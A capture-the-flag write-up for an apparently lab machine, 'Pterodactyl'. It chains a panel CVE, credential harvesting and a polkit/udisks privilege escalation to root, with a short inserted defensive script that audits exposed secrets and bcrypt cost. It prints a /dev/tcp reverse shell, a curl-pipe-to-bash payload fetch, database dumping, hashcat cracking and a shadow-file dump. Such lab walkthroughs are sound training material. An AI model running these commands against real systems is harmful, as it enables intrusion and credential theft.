Basic Information

Port Scan

22 and 80:

$ nmap -sC -sV -Pn 10.129.249.215
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-12 18:39 +0900
Nmap scan report for 10.129.249.215
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
| 256 a3:74:1e:a3:ad:02:14:01:00:e6:ab:b4:18:84:16:e0 (ECDSA)
|_ 256 65:c8:33:17:7a:d6:52:3d:63:c3:e4:a9:60:64:2d:cc (ED25519)
80/tcp open http nginx 1.21.5
|_http-server-header: nginx/1.21.5
|_http-title: Did not follow redirect to http://pterodactyl.htb/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1062.06 seconds

80

A hosts entry is needed:

10.129.249.215 pterodactyl.htb

Game-related:

Subdomain Scan

Subdomain enumeration turns up a panel:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://pterodactyl.htb/" -H "Host: FUZZ.pterodactyl.htb" -fs 145

panel [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 333ms]

panel

It is clearly running Pterodactyl:

CVE-2025-49132

A search turns up the relevant vulnerability:

Following the steps one by one gives a shell as wwwrun:

# shell.sh
bash -i >& /dev/tcp/10.10.14.17/4444 0>&1

# http server
python3 -m http.server 7777

# listener
penelope -p 4444

# exploit
python3 ape1.py --host panel.pterodactyl.htb --interactive

shell> curl http://10.10.14.17:7777/shell.sh | bash

user flag

wwwrun can access the phileasfogg3 user's home directory:

env

The environment variables reveal some information, including the database password:

wwwrun@pterodactyl:/home/phileasfogg3> env

HASHIDS_SALT=pKkOnx0IzJvaUXKWt2PK
APP_KEY=base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY=
DB_PORT=3306
DB_HOST=127.0.0.1
DB_PASSWORD=PteraPanel
DB_USERNAME=pterodactyl
DB_CONNECTION=mysql
DB_DATABASE=panel

mysql

Next, look through the database, pull the hashes from it, and crack the password:

mysql -h 127.0.0.1 -u pterodactyl -p'PteraPanel'

MariaDB [(none)]> show databases;
MariaDB [(none)]> use panel;
MariaDB [panel]> show tables;
MariaDB [panel]> desc users;
MariaDB [panel]> select username,password from users;

headmonitor $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2
phileasfogg3 $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi

phileasfogg3's password cracks:

sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

!QAZ2wsx
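An added defender-side check, not part of the writeup: given an environment dump and a users-table dump in the shape shown above, it lists which variables hold secrets readable by the web-server user and flags bcrypt hashes whose cost factor is low enough to make the offline rockyou attack above cheap. The sample input is constructed (placeholder secrets, fake digests), and SENSITIVE_KEY_RE and the minimum cost of 12 are my own choices.

```python
import re
# Constructed sample input modelled on the writeup's env dump and users table;
# secret values are placeholders, not the box's real ones.
SAMPLE_ENV = """\
HASHIDS_SALT=placeholder_salt
APP_KEY=base64:placeholder_app_key=
DB_PORT=3306
DB_HOST=127.0.0.1
DB_PASSWORD=placeholder_db_password
DB_USERNAME=pterodactyl
DB_CONNECTION=mysql
DB_DATABASE=panel
"""
# Constructed bcrypt strings with the right 60-char layout but fake digests.
SAMPLE_USERS = """\
headmonitor $2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234
phileasfogg3 $2y$12$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234
"""
# Names that usually hold material worth protecting in a Laravel-style .env.
SENSITIVE_KEY_RE = re.compile(r"PASSWORD|SECRET|KEY|TOKEN|SALT", re.IGNORECASE)
# bcrypt modular-crypt: $2<variant>$<2-digit cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$2[abxy]?\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

def find_exposed_secrets(env_text):
    """Names of sensitive variables present in a process environment dump."""
    found = []
    for line in env_text.splitlines():
        key, sep, _ = line.partition("=")
        if sep and SENSITIVE_KEY_RE.search(key):
            found.append(key)
    return found

def parse_bcrypt(hash_str):
    """Cost and salt of a bcrypt string, or None if it is not bcrypt."""
    m = BCRYPT_RE.match(hash_str)
    return {"cost": int(m.group(1)), "salt": m.group(2)} if m else None

def audit_hashes(users_text, min_cost=12):
    """Accounts whose hash is not bcrypt or whose cost is below min_cost; cost is
    log2 of the rounds, so 'speedup' is how many times cheaper a guess is."""
    weak = []
    for line in users_text.splitlines():
        user, _, hash_str = line.partition(" ")
        parsed = parse_bcrypt(hash_str)
        if parsed is None:
            weak.append({"user": user, "cost": None, "speedup": None})
        elif parsed["cost"] < min_cost:
            weak.append({"user": user, "cost": parsed["cost"],
                         "speedup": 2 ** (min_cost - parsed["cost"])})
    return weak
```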

phileasfogg3

The recovered password logs in as phileasfogg3, and the mail hints at the next step:

phileasfogg3@pterodactyl:~> cat /var/mail/phileasfogg3

The mail says it concerns external media; combined with the system being openSUSE, a search turns up the relevant vulnerabilities:

CVE-2025-6018 & CVE-2025-6019

So first use 6018 to create the allow_active condition that 6019 needs:

python3 CVE-2025-6018.py -i pterodactyl.htb -u phileasfogg3 -p '!QAZ2wsx'

That gives an interactive terminal; run 6019 inside it, but generate xfs.image locally first and upload it:

scp xfs.image phileasfogg3@pterodactyl.htb:/home/phileasfogg3

# The 6019 code also needs a small change at line 9, because the machine has no mkfs.xfs
# local deps=("dd" "mkfs.xfs" "mount" "umount" "udisksctl" "gdbus" "killall" "grep" "chmod" "cp")
local deps=("dd" "mount" "umount" "udisksctl" "gdbus" "killall" "grep" "chmod" "cp")


./exploit.sh

root flag

After 6019 finishes, a SUID bash appears in tmp (the output here is incomplete and does not show the SUID bash path; just check tmp manually):

shadow

root:$6$iOhjvxjnk.Sgt97C$Fr4NzyL9SEFOiH653sh30DAR1kmR9jxGNeWMplTMQmlXVO/CfRXy7q2xopOBkfG2SG/I3O7KDOFHT7bOTZG.a0:20343::::::
phileasfogg3:$6$Zc6vsfIsXPSjCLgU$1CEcVIqk717ztdSj0VJ3CaCxSsGYV8N2DgJsJGXeDKoYoBmc8l2F5LbvWFfRYuyBn0Xf5t1Tx4i9Ao8xsSnXQ.:20399:0:99999:7:::
